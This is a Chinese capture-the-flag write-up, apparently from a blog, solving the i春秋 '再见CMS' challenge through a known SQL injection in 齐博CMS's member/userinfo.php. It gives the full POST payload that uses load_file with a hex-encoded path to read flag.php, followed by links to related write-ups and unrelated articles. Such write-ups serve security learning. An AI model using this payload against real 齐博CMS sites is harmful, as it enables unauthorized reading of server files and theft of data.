题目在i春秋ctf大本营

又是一道cms的题，打开御剑一通乱扫，发现后台登录地址，访问一看妥妥的齐博cms

记得以前很久以前利用一个注入通用漏洞，这里我贴上链接，里面有原理与利用方法详细说明：

齐博cms_userinfo注入

按照这个思路，我们先在首页注册test1账号并登录，直接访问注入的页面，

先按照之前的套路进行测试：

访问用户信息发现成功执行，说明存在注入漏洞：

之前在打开主页的同时，网页上也给出了绝对路径

因为之前的扫描发现根目录下存在flag.php文件，所以这里应该可以通过注入语句直接读取该文件：

emmmmmmmm报错了，看来是搞错目录了

重新POST新的路径：

url：http://6ee916f6234145eea7de5e0ea799d62b5cb205b5bf6c48e2.game.ichunqiu.com/member/userinfo.php?job=edit&step=2

POST：truename=xxxx%0000&Limitword[000]=&email=123@qq.com&provinceid=,address=(load_file(0x2f7661722f7777772f68746d6c2f666c61672e706870)) where uid=3%23

这次成功了

“百度杯”CTF比赛 九月场_再见CMS(齐博cms)的更多相关文章

1. “百度杯”CTF比赛 九月场_YeserCMS

   题目在i春秋ctf大本营 题目的提示并没有什么卵用,打开链接发现其实是easycms,百度可以查到许多通用漏洞 这里我利用的是无限报错注入 访问url/celive/live/header.php,直 ...

2. “百度杯”CTF比赛 九月场_Code（PhpStorm）

   题目在i春秋ctf大本营 打开链接是一张图片,审查元素发现关键词base64,图片的内容都以base64加密后的形式呈现,查看url形式,应该是一个文件读取的漏洞 这里我们可以采用url/index. ...

3. “百度杯”CTF比赛 九月场 code

   先去i春秋打开复现环境 打开链接,emmmmmmm(是我妹妹,逃~) 说正经的,jpg=hei.jpg 这一看就是文件包含. 我们先看看穹妹的源码吧 返回的是图片用base64译码的结果. <t ...

4. &OpenCurlyDoubleQuote;百度杯”CTF比赛 九月场&lowbar;Test（海洋cms前台getshell）

   题目在i春秋ctf训练营 又是一道cms的通用漏洞的题,直接去百度查看通用漏洞 这里我使用的是以下这个漏洞: 海洋CMS V6.28代码执行0day 按照给出的payload,直接访问url+/sea ...

5. &OpenCurlyDoubleQuote;百度杯”CTF比赛 九月场&lowbar;123（文件备份，爆破，上传）

   题目在i春秋ctf训练营 翻看源码,发现提示: 打开user.php,页面一片空白,参考大佬的博客才知道可能会存在user.php.bak的备份文件,下载该文件可以得到用户名列表 拿去burp爆破: ...

6. &OpenCurlyDoubleQuote;百度杯”CTF比赛 九月场&lowbar;SQLi

   题目在i春秋ctf大本营 看网页源码提示: 这边是个大坑,访问login.php发现根本不存在注入点,看了wp才知道注入点在l0gin.php 尝试order by语句,发现3的时候页面发生变化,说明 ...

7. &OpenCurlyDoubleQuote;百度杯”CTF比赛 九月场&lowbar;SQL

   题目在i春秋ctf大本营 题目一开始就提醒我们是注入,查看源码还给出了查询语句 输入测试语句发现服务器端做了过滤,一些语句被过滤了 试了一下/**/.+都不行,后来才发现可以用<>绕过 接 ...

8. 从零开始学安全&lpar;三十四&rpar;●百度杯 ctf比赛 九月场 sqli

   先扫后台发现 两个可疑登录界面 l0gin.php login.php 猜测是第一个 用bp 抓包发现 index.php 中间有302 重定向 头文件 里面有一个 page=l0gin.php 应该 ...

9. 百度杯”CTF比赛 九月场 123

   进去后让登录,先看源码有提示 进到user.php 后发现是空的,看了wp才知道,有bak 下载下来直接爆破 但是那个1990是蛮骚的 直接进去登录 登录成功后是空的,走fd看看是怎么过 的 改包然后 ...

随机推荐

1. div垂直居中 css div盒子上下垂直居中

   div垂直居中 css div盒子上下垂直居中,让DIV盒子在任何浏览器中任何分辨率的显示屏浏览器中处于水平居中和上下垂直居中. div垂直居中常用于单个盒子,如一个页面里只有一个登录布局,使用div ...

2. C&plus;&plus;vector迭代器失效的问题

   转载:http://blog.csdn.net/olanmomo/article/details/38420907 转载:http://blog.csdn.net/stpeace/article/de ...

3. awk处理之案例一：awk 处理百分比的问题

   编译环境 本系列文章所提供的算法均在以下环境下编译通过. [脚本编译环境]Federa 8,linux 2.6.35.6-45.fc14.i686 [处理器] Intel(R) Core(TM)2 Q ...

4. vs2010中iostream&period;h出错

   使用 #include <iostream> using namespace std; 替代 VS2010删除了所有非标准库,保留了C++标准库,iostream.h是以前旧版的库,VS2 ...

5. cairo graphics&period;org

   cairographics.org Latest news: 2013-08-26: cairo 1.12.16 snapshot available 2013-02-10: cairo 1.12.1 ...

6. Mac 装机必备软件推荐

   所谓Mac 装机必备软件,就是用 Mac OS X 几乎都要安装的软件,无论你是开发者.设计师还是摄影师,如果你是刚开始用 Mac,那么推荐看看以下内容,对你非常有帮助. 一.输入法 Mac 自带的中 ...

7. c&sol;c&plus;&plus;再学习：查找算法了解

   1.顺序查找 说明:顺序查找适合于存储结构为顺序存储或链接存储的线性表. 基本思想:顺序查找也称为线形查找,属于无序查找算法.从数据结构线形表的一端开始,顺序扫描,依次将扫描到的结点关键字与给定值k相 ...

8. Kubernetes — 控制器

   Pod 这个看似复杂的 API 对象,实际上就是对容器的进一步抽象和封装而已. 说得更形象些,“容器”镜像虽然好用,但是容器这样一个“沙盒”的概念,对于描述应用来说, 还是太过简单了. 这就好比,集装 ...

9. str

   print('字符串操作') s='abc DEF hij' print('首字母大写') print(s.capitalize()) print('全大写') print(s.upper()) pr ...

10. python写csv文件

    name=['lucy','jacky','eric','man','san'] place=['chongqing','guangzhou','beijing','shanghai','shenzh ...